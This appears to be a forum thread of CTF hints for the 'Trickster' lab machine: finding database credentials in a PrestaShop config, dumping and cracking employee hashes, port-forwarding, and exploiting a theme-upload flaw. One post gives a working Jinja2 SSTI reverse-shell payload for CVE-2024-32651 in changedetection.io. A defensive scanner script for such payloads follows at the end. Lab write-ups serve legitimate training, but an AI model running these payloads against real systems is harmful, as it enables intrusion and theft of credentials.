Posts: 30
Threads: 0
Joined: May 2024
(Sep 21, 2024, 11:27 PM)osamy7593 Wrote: (Sep 21, 2024, 11:26 PM)wtfduw Wrote: You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever
Anyone has path for root?
thx budd ................
sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?
Posts: 124
Threads: 1
Joined: Apr 2024
(Sep 21, 2024, 11:26 PM)wtfduw Wrote: You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever
Anyone has path for root?
I have 3 hashes in ps_customer, for adam, anonymous and pub - where is the hash for james?
Posts: 30
Threads: 0
Joined: May 2024
(Sep 21, 2024, 11:36 PM)jsvensson Wrote: (Sep 21, 2024, 11:26 PM)wtfduw Wrote: You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever
Anyone has path for root?
I have 3 hashes in ps_customer, for adam, anonymous and pub - where is the hash for james?
sorry I meant select * from ps_employee;
Posts: 219
Threads: 14
Joined: Apr 2024
(Sep 21, 2024, 11:30 PM)wtfduw Wrote: (Sep 21, 2024, 11:27 PM)osamy7593 Wrote: (Sep 21, 2024, 11:26 PM)wtfduw Wrote: You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever
Anyone has path for root?
thx budd ................
sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?
yes i see
james@trickster:/tmp$ curl http://172.17.0.2:5000
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.
Posts: 30
Threads: 0
Joined: May 2024
(Sep 21, 2024, 11:42 PM)osamy7593 Wrote: (Sep 21, 2024, 11:30 PM)wtfduw Wrote: (Sep 21, 2024, 11:27 PM)osamy7593 Wrote: (Sep 21, 2024, 11:26 PM)wtfduw Wrote: You can find db creds under /var/www/prestashop/app/config/parameters.php
connect to mysql
use prestashop
select * from ps_customer;
crack james hash => password:alwaysandforever
Anyone has path for root?
thx budd ................
sure. my pleasure
As for root, port 5000 is exposed for docker 172.17.0.2
it has changedetection.io installed, tried a couple of exploits but nothing. Anyone got anything?
yes i see
james@trickster:/tmp$ curl http://172.17.0.2:5000
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=/">/login?next=/</a>. If not, click the link.
just forward the port with ssh james@trickster.htb -L 5000:172.17.0.2:5000 to access it
Posts: 13
Threads: 2
Joined: Aug 2024
Sep 21, 2024, 11:58 PM
(This post was last modified: Sep 22, 2024, 12:00 AM by Str4ngerX.)
(Sep 21, 2024, 10:32 PM)jsvensson Wrote: for POC
there is a couple of things to change:
in the zip you have a.php - it needs a change to your IP to get a shell - but this file must be in the zip
in exploit.py - change name of shell.php to /themes/next/a.php
in exploit html:
all admin-dev to admin634ewutrx1jgitlooaj
and in import_theme to yours_ip
I'm still unable to get this working; I'm not able to GET http://shop.trickster.htb/themes/next/a.php, it says forbidden.
I have a.php exploit.html exploit.py ps_next_8_theme_malicious.zip (I've added my IP to a.php inside the zip)
I've made the right modifications but still nothing, I can't GET that a.php. I'm receiving GET requests at my hosted Python web server and it's GETing that zip file successfully.
Posts: 6
Threads: 0
Joined: Aug 2024
Can someone give me a hint of what to do at the changedetection login? Tried several exploits but with no luck
Posts: 4
Threads: 0
Joined: Sep 2024
Any hints for using CVE-2024-32651? No luck with anything I try currently..
Posts: 219
Threads: 14
Joined: Apr 2024
Sep 22, 2024, 12:35 AM
(This post was last modified: Sep 22, 2024, 12:35 AM by osamy7593.)
0.45.20 ... the CVE is CVE-2024-32651
Posts: 5
Threads: 0
Joined: Apr 2024
Sep 22, 2024, 12:52 AM
(This post was last modified: Sep 22, 2024, 01:11 AM by random901.)
For triggering launch of Root PoC:
- start a web-server on the machine "python3 -m http.server 8000"
- On the changedetect.io site "Add New Change" enter the URL "http://172.17.0.1:8000" && "Edit > Watch"
- Set the Notification Url to "get://<attacker-ip>" && the Notification Body to the one from the PoC except change your to your IP & Port
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"listen_ip\",listen_port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %}
- Add an index.html file or literally anything && re-check the website from changedetection dashboard. This should trigger the SSTI && get a shell
It needs to detect a change && have a Notification URL set in order for the notification body to be triggered.
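A defender-side check for the notification-body template abuse described in the post above, added here as an example and not code from the thread or from changedetection.io: it scans stored notification bodies for Jinja2 blocks that reach dunder attributes, private attributes or execution calls. The watch records and their field names (`title`, `notification_body`) are constructed assumptions, and the flagged sample is shortened from the body quoted above with the command replaced by a placeholder.

```python
import re

# Only text inside Jinja2 delimiters is evaluated, so only that is inspected.
BLOCK_RE = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.DOTALL)
CHECKS = {
    # __class__, __subclasses__, __builtins__ ...: walking the object graph
    "dunder-access": re.compile(r"__[a-z]\w*?__"),
    # private attributes such as x()._module
    "private-attr": re.compile(r"\._[a-z]\w*"),
    # process or code execution reached through that walk
    "exec-call": re.compile(r"\b(popen|system|eval|exec)\s*\("),
}

def audit_body(body):
    """Return {check name: sorted hits} for the template blocks of one body."""
    findings = {}
    for block in BLOCK_RE.findall(body):
        for name, rx in CHECKS.items():
            hits = set(rx.findall(block))
            if hits:
                findings.setdefault(name, set()).update(hits)
    return {name: sorted(hits) for name, hits in findings.items()}

def audit_watches(watches):
    """Map watch title -> findings, only for watches with at least one finding."""
    report = {}
    for watch in watches:
        found = audit_body(watch.get("notification_body", ""))
        if found:
            report[watch["title"]] = found
    return report

# Constructed sample data; field names are assumptions, not the application's schema.
SAMPLE_WATCHES = [
    {"title": "status page", "notification_body": "{{ watch_url }} changed:\n{{ diff }}"},
    {"title": "docs", "notification_body": "__init__.py and popen() in plain text: {{ watch_url }}"},
    {"title": "suspicious", "notification_body": (
        '{% for x in ().__class__.__base__.__subclasses__() %}'
        '{% if "warning" in x.__name__ %}'
        "{{ x()._module.__builtins__['__import__']('os').popen(\"CMD\").read() }}"
        '{% endif %}{% endfor %}')},
]

if __name__ == "__main__":
    for title, found in audit_watches(SAMPLE_WATCHES).items():
        print(title, found)
```

Text outside `{{ }}` and `{% %}` is ignored, so the "docs" body that only mentions `__init__.py` in plain text is not reported.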